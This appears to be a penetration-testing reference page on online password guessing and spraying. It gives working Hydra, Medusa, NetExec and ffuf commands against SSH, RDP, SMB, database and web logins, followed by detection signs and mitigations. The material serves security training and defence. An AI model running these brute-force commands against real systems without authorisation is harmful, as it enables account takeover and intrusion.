Online Attacks

Overview

Online attacks test credentials directly against live services — SSH, RDP, FTP, web logins, SMB, MSSQL, and more. Unlike offline cracking, online attacks interact with the target and are constrained by network speed, account lockout policies, and detection systems. Hydra and NetExec are the primary tools. Online attacks are slower but do not require hash extraction first.

ATT&CK Mapping

  • Tactic: TA0006 - Credential Access
  • Technique: T1110.001 - Brute Force: Password Guessing
  • Technique: T1110.003 - Brute Force: Password Spraying

Prerequisites

  • Network access to the target service
  • Username(s) — known or enumerated
  • Password wordlist or single password for spraying
  • Understanding of the target's lockout policy (to avoid locking accounts)

Techniques

Hydra

# Hydra
# https://github.com/vanhauser-thc/thc-hydra

# SSH brute-force
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<target>

# SSH with username list
hydra -L users.txt -P passwords.txt ssh://<target>

# FTP
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ftp://<target>

# RDP
hydra -l <username> -P /usr/share/wordlists/rockyou.txt rdp://<target>

# SMB
hydra -l <username> -P /usr/share/wordlists/rockyou.txt smb://<target>

# MySQL
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<target>

# MSSQL
hydra -l sa -P /usr/share/wordlists/rockyou.txt mssql://<target>

# HTTP POST form login
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login:user=^USER^&pass=^PASS^:Invalid credentials"

# HTTP Basic Auth
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <target> http-get /admin/

# Control threads and wait time
hydra -l <username> -P passwords.txt -t 4 -w 30 ssh://<target>

# Stop after first valid password
hydra -l <username> -P passwords.txt -f ssh://<target>

# Verbose output
hydra -l <username> -P passwords.txt -V ssh://<target>

Key hydra flags:

Flag       Purpose
-l / -L    Single username / username list
-p / -P    Single password / password list
-t         Number of parallel threads (default 16)
-f         Stop after first valid login
-w         Wait time for a response (default 32s)
-W         Wait time between connections per thread
-V         Verbose — show each attempt
-s         Specify non-default port
-o         Output results to file

Medusa

# Medusa
# https://github.com/jmk-foofus/medusa

# SSH
medusa -h <target> -u <username> -P /usr/share/wordlists/rockyou.txt -M ssh

# FTP
medusa -h <target> -u <username> -P /usr/share/wordlists/rockyou.txt -M ftp

# Multiple hosts
medusa -H hosts.txt -u <username> -P passwords.txt -M ssh

# Threads and speed
medusa -h <target> -u <username> -P passwords.txt -M ssh -t 4 -T 10

NetExec (Network Services)

# NetExec
# https://github.com/Pennyw0rth/NetExec

# SMB brute-force
nxc smb <target> -u users.txt -p passwords.txt

# SMB with hash
nxc smb <target> -u <user> -H '<NThash>'

# WinRM
nxc winrm <target> -u users.txt -p passwords.txt

# SSH
nxc ssh <target> -u users.txt -p passwords.txt

# MSSQL
nxc mssql <target> -u users.txt -p passwords.txt

# Keep testing after a valid credential is found (by default nxc stops at the first valid login per host)
nxc smb <target> -u users.txt -p passwords.txt --continue-on-success

# Check if user is admin
nxc smb <target> -u <user> -p <password>
# (Pwn3d!) in output = local admin

Web Application Login

# ffuf — web form brute-force
# https://github.com/ffuf/ffuf
# POST form
ffuf -u http://<target>/login \
  -X POST \
  -d "username=admin&password=FUZZ" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -w /usr/share/wordlists/rockyou.txt \
  -fc 401

# With username fuzzing too
ffuf -u http://<target>/login \
  -X POST \
  -d "username=UFUZZ&password=PFUZZ" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -w users.txt:UFUZZ \
  -w passwords.txt:PFUZZ \
  -fc 401 \
  -mode clusterbomb

Detection Methods

Network-Based Detection

  • High volume of failed authentication attempts from a single source IP
  • Multiple login attempts across different accounts in rapid succession
  • Authentication traffic at unusual hours

Host-Based Detection

  • Windows Event ID 4625 — failed logon attempts
  • Windows Event ID 4771 — Kerberos pre-authentication failed
  • Linux: repeated "Failed password" entries in /var/log/auth.log
  • Account lockout events

Mitigation Strategies

  • Account lockout policies — lock accounts after 3-5 failed attempts (but beware of DoS via intentional lockout)
  • Rate limiting — slow down repeated login attempts at the application or network level
  • Multi-factor authentication — prevents access even with valid credentials
  • Fail2ban / intrusion prevention — automatically block IPs with excessive failed attempts
  • Strong password requirements — reduce success rate of dictionary attacks

References

Official Documentation

MITRE ATT&CK